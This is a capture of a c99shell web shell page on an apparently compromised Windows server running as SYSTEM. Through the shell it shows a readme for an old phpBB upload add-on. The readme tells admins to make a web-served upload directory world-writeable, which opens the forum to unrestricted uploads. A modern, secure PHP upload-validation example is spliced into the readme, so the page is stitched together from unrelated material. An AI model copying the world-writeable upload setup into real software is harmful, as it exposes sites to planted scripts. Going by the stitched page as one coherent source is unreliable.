!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\htdocs\phpbb\   drwxrwxrwx
Free 4.1 GB of 39.52 GB (10.37%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]

Viewing file:     readme.txt (6.35 KB)      -rw-rw-rw-
I set up the hack so that only registered users would see the upload entry on the forms used to post.

Also note, the hack requires that a directory be world writeable, preferably as a subdirectory of your phpBB directory. 


INSTALLATION: 

1. Upload these two php files: 
process_upload.php 
upload_dir.php 

Drop the .txt extension when putting these in your main phpBB directory. 

2. Edit config.php and include the following somewhere before the "?>": 
Code:
--------------------------------------------------------------------------------
 
// upload hack
$url_uploads = "./uploads"; // relative to $url_phpbb!
$max_upload_size = "800000"; // in bytes
$allow_uploads = 1; // allow uploads, easy on/off

 

--------------------------------------------------------------------------------
 


3. Edit reply.php: 
Find all instances of: (more than one!) 
Code:
--------------------------------------------------------------------------------
 
<FORM ACTION="<?php echo $PHP_SELF?>" METHOD="POST">

 

--------------------------------------------------------------------------------
 

Replace with: 
Code:
--------------------------------------------------------------------------------
 
<FORM ACTION="<?php echo $PHP_SELF?>" METHOD="POST" ENCTYPE="multipart/form-data">

 

--------------------------------------------------------------------------------
 


Find: 
Code:
--------------------------------------------------------------------------------
 
		   // If it's been edited more than once, there might be old "edited by" strings with
		   // escaped HTML code in them. We want to fix this up right here:
		   $message = preg_replace("#<font size=-1>\[ $edit_by(.*?) \]</font>#si", '<font size=-1>[ ' . $edit_by . ' ]</font>', $message);
      }
   }

 

--------------------------------------------------------------------------------
 

Below add: 
Code:
--------------------------------------------------------------------------------
 
   // upload hack
   if($allow_uploads == 1)
      include('process_upload.'.$phpEx);

 

--------------------------------------------------------------------------------
 

Find: 
Code:
--------------------------------------------------------------------------------
 
		<TD  BGCOLOR="<?php echo $color1?>" width=25%><font size="<?php echo $FontSize2?>" face="<?php echo $FontFace?>"><b><?php echo $l_options?>:</b></TD>
		<TD  BGCOLOR="<?php echo $color2?>" ><font size="<?php echo $FontSize2?>" face="<?php echo $FontFace?>">

 

--------------------------------------------------------------------------------
 

Below add: 
Code:
--------------------------------------------------------------------------------
 
<?php
// upload hack
 if($user_logged_in && $allow_uploads == 1) {
?>
<INPUT TYPE="HIDDEN" NAME="MAX_FILE_SIZE" VALUE="<?php echo $max_upload_size?>">
Upload File: <INPUT TYPE="FILE" NAME="file1" SIZE="30">
<?php
echo "<BR><SMALL>Upload limit (bytes): $max_upload_size</SMALL><BR><BR>";
 } // end file upload
?>

 

--------------------------------------------------------------------------------
 


4. Edit newtopic.php: 

Find: 
Code:
--------------------------------------------------------------------------------
 
<FORM ACTION="<?php echo $PHP_SELF?>" METHOD="POST">

 

--------------------------------------------------------------------------------
 

Replace with: 
Code:
--------------------------------------------------------------------------------
 
<FORM ACTION="<?php echo $PHP_SELF?>" METHOD="POST" ENCTYPE="multipart/form-data">

 

--------------------------------------------------------------------------------
 


Find: 
Code:
--------------------------------------------------------------------------------
 
   if($allow_html == 0 || isset($html))
   {
     $message = htmlspecialchars($message);
     $is_html_disabled = true;
   }

 

--------------------------------------------------------------------------------
 

Below add: 
Code:
--------------------------------------------------------------------------------
 
   // upload hack
   if($allow_uploads == 1)
      include('process_upload.'.$phpEx);

 

--------------------------------------------------------------------------------
 


Find: 
Code:
--------------------------------------------------------------------------------
 
<TD  BGCOLOR="<?php echo $color1?>" width=25%><font size="<?php echo $FontSize2?>" face="<?php echo $FontFace?>"><b><?php echo $l_options?>:</b></TD>
		<TD  BGCOLOR="<?php echo $color2?>" ><font size="<?php echo $FontSize2?>" face="<?php echo $FontFace?>">

 

--------------------------------------------------------------------------------
 

Below add: 
Code:
--------------------------------------------------------------------------------
 
<?php
// upload hack
 if($user_logged_in && $allow_uploads == 1) {
?>
<INPUT TYPE="HIDDEN" NAME="MAX_FILE_SIZE" VALUE="<?php echo $max_upload_size?>">
Upload File: <INPUT TYPE="FILE" NAME="file1" SIZE="30">
<?php
echo "<BR><SMALL>Upload limit (bytes): $max_upload_size</SMALL><BR><BR>";
 } //allow file upload
?>

 

--------------------------------------------------------------------------------
 


5. Edit viewtopic.php to allow moderators to easily delete uploaded files: 
Find: 
Code:
--------------------------------------------------------------------------------
 
echo "<a href=\"$url_phpbb/topicadmin.$phpEx?mode=move&topic=$topic&forum=$forum\"><IMG SRC=\"$movetopic_image\" ALT=\"$l_movetopic\" BORDER=0></a> ";
echo "<a href=\"$url_phpbb/topicadmin.$phpEx?mode=del&topic=$topic&forum=$forum\"><IMG SRC=\"$deltopic_image\" ALT=\"$l_deletetopic\" BORDER=0></a></CENTER>\n";

 

--------------------------------------------------------------------------------
 

Below add: 
Code:
--------------------------------------------------------------------------------
 
echo "<CENTER><FONT FACE=\"$FontFace\" SIZE=\"$FontSize1\" COLOR=\"$textcolor\">"; 
echo "<a href=\"$url_phpbb/upload_dir.$phpEx\">[Edit uploads]</a>"; 
echo "</FONT></CENTER>"; 
 

--------------------------------------------------------------------------------
 



I think that's about it. The trick to getting it to work is to make sure your directory is set correctly and writeable to world (chmod 1777 should work), and to make sure you add the ENCTYPE="multipart/form-data" to all the FORM tags. 
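
The MAX_FILE_SIZE field is only a hint to the browser, and a world-writeable directory under the phpBB tree is served by the web server, so any limit has to be enforced on the server. The following is an added example of such checks for the `file1` field, not the hack's own process_upload.php (which this readme does not show); it assumes PHP 7 or later with the fileinfo extension, and the storage path and type allowlist are hypothetical.

```php
<?php
// Added example: server-side checks for the "file1" field from the forms above.
// Assumptions: PHP >= 7 with fileinfo; the allowlist and storage path below are
// hypothetical values, not settings taken from the hack.
function store_upload(array $file, int $max_bytes, string $upload_root): string
{
    // Reject anything PHP itself flagged as a failed or partial upload.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed, code ' . (int)($file['error'] ?? -1));
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an HTTP upload');
    }
    // Enforce the size limit on the received bytes, not on the form field.
    if (filesize($file['tmp_name']) > $max_bytes) {
        throw new RuntimeException('file exceeds limit');
    }

    // Allowlist by extension AND by the content type sniffed from the bytes.
    $allowed = ['png' => 'image/png', 'jpg' => 'image/jpeg', 'txt' => 'text/plain'];
    $ext  = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset($allowed[$ext]) || $allowed[$ext] !== $mime) {
        throw new RuntimeException('file type not allowed');
    }

    // Never reuse the client-supplied name: generate one and keep only the vetted extension.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($upload_root, '/\\') . DIRECTORY_SEPARATOR . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640); // readable by the owner and group only, never executable
    return $dest;
}

if (isset($_FILES['file1'])) {
    try {
        // 800000 mirrors $max_upload_size; the path is a hypothetical directory
        // outside the document root, writable only by the web server account.
        $stored = store_upload($_FILES['file1'], 800000, '/var/phpbb-uploads');
    } catch (RuntimeException $e) {
        error_log('upload rejected: ' . $e->getMessage());
    }
}
```

Files stored this way are no longer reachable by URL, so downloads need a script that reads them from the storage directory and sends them with a fixed Content-Type.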


--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--